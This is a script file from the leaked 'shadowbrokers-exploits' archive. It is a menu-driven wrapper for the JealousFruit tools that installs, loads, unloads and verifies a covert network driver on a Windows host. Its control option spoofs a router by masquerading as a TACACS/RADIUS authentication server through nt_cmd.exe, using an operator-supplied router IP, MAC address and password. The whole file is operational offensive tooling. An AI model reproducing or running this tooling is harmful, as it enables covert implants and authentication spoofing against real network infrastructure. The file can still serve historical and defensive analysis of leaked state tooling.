shadowbrokers-exploits/windows/Resources/Ep/Scripts/JealousFruit.eps
2017-04-14 11:45:07 +02:00

183 lines
4.9 KiB
PostScript

#--------------------------------------------------------
# File: JealousFruit.eps
#
# Wrapper script for JealousFruit tools
#
# Modifications:
# 02/28/03 Created.
#--------------------------------------------------------
@echo off;
# defaults
string $driverName = "tapindis";
# commands
int $installCmdsStart = 1;
int $normalCmdsStart = 8;
int $controlCmdsStart = 8;
int $captureCmdsStart = 16;
string $commands;
$commands[0] = "Quit";
# start of "install" commands
$commands[1] = "Change driver name";
$commands[2] = "Install tools";
$commands[3] = "Uninstall tools";
$commands[4] = "Load driver";
$commands[5] = "Unload driver";
$commands[6] = "Verify install";
$commands[7] = "Verify driver is running";
# NOTE: not sure how many of these cmds we need to support, if any,
# as in if we don't have config or control commands, do we still need
# place holders for them ???
# start of "config" commands
#$commands[8] = "Get current status (not impl'd)";
#$commands[9] = "Get packet filter (not impl'd)";
#$commands[10] = "Set packet filter (not impl'd)";
#$commands[11] = "Set max capture file size (not impl'd)";
# start of "control" commands
$commands[8] = "Spoof router";
#$commands[13] = "Enable scanning (not impl'd)";
#$commands[14] = "Stop scanning (not impl'd)";
#$commands[15] = "Start scanning (not impl'd)";
# start of "capture file" commands
#$commands[16] = "Retreive packet capture file (not impl'd)";
#$commands[17] = "Delete packet capture file (not impl'd)";
#$commands[18] = "Parse capture file (not impl'd)";
@record on;
while (true) {
echo "\r\n\r\n";
# Print the current configuration
echo "Current Configuration:";
echo "\tDriver name : $driverName";
echo "";
# print the command list
int $i=0;
while ($i < sizeof($commands)) {
if ($i == $installCmdsStart) {
echo "";
echo "Installation commands:";
} else if ($i == $normalCmdsStart) {
echo "";
echo "Configuration commands";
} else if ($i == $controlCmdsStart) {
echo "";
echo "Control commands:";
} else if ($i == $captureCmdsStart) {
echo "";
echo "Capture File commands:";
}
echo "($i). $commands[$i]";
$i++;
}
echo "";
int $choice = GetInput("Enter the desired option");
if ($choice == 0) {
# quit
return true;
} else if ($choice == 1) {
# Change driver name
echo "Current driver name = '$driverName'";
$driverName = GetInput("Enter new driver name");
} else if ($choice == 2) {
# install driver
if (`script JealousFruit\\Install.eps $driverName`) {
echo "INSTALL SUCCESS";
echo "";
echo "NOTE: The driver has not been loaded";
} else {
echo "**** INSTALL FAILED ****";
}
} else if ($choice == 3) {
# uinstall driver
if (`script JealousFruit\\Uninstall.eps $driverName`) {
echo "UNINSTALL SUCCESS";
} else {
echo "**** UNINSTALL FAILED ****";
}
} else if ($choice == 4) {
# load the driver
if (prompt "Load the driver ($driverName)?") {
@echo on;
`driverload -name $driverName`;
@echo off;
}
} else if ($choice == 5) {
# unload the driver
if (prompt "Unload the driver ($driverName)?") {
@echo on;
`driverunload -name $driverName`;
@echo off;
}
} else if ($choice == 6) {
# verify install
if (`script JealousFruit\\VerifyInstall.eps $driverName`) {
echo "VERIFICATION SUCCESSFULL";
} else {
echo "**** UNABLE TO VERIFY INSTALL ****";
}
} else if ($choice == 7) {
# verify install
if (`script JealousFruit\\VerifyRunning.eps $driverName`) {
echo "VERIFICATION SUCCESSFULL";
} else {
echo "**** UNABLE TO VERIFY DRIVER IS RUNNING ****";
}
### CONTROL COMMANDS ###
} else if ($choice == 8) {
# spoof the router
# get the root directory
string $nt_root;
if (`regquery -hive L -subkey "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" -value SystemRoot`) {
$nt_root = GetCmdData("enum_keyvalue_data");
}
ifnot (defined($nt_root[0])) {
echo "* Unable to determine system root";
$nt_root = GetInput("Enter the system root (eg c:\\winnt)");
ifnot (defined($nt_root[0])) {
return false;
}
}
string $spoof_ip = "0.0.0.0";
string $target_ip = "0.0.0.0";
string $target_mac = "0123456789af";
string $pass = "password";
$spoof_ip = GetInput("Enter the TACACS/RADIUS server IP (the IP to masquerade as)");
$target_ip = GetInput("Enter the Router IP ");
$target_mac = GetInput("Enter the MAC address of the Router");
$pass = GetInput("Enter the password to use");
if (`run -command "$nt_root\\nt_cmd.exe -s $spoof_ip -t $target_ip -m $target_mac -p $pass" `) {
echo "SPOOF SUCCESSFULL";
} else {
echo "**** UNABLE TO SPOOF ROUTER ****";
}
} else {
# invalid choice
echo "*** Invalid choice ***";
}
pause;
}
@record off;
return true;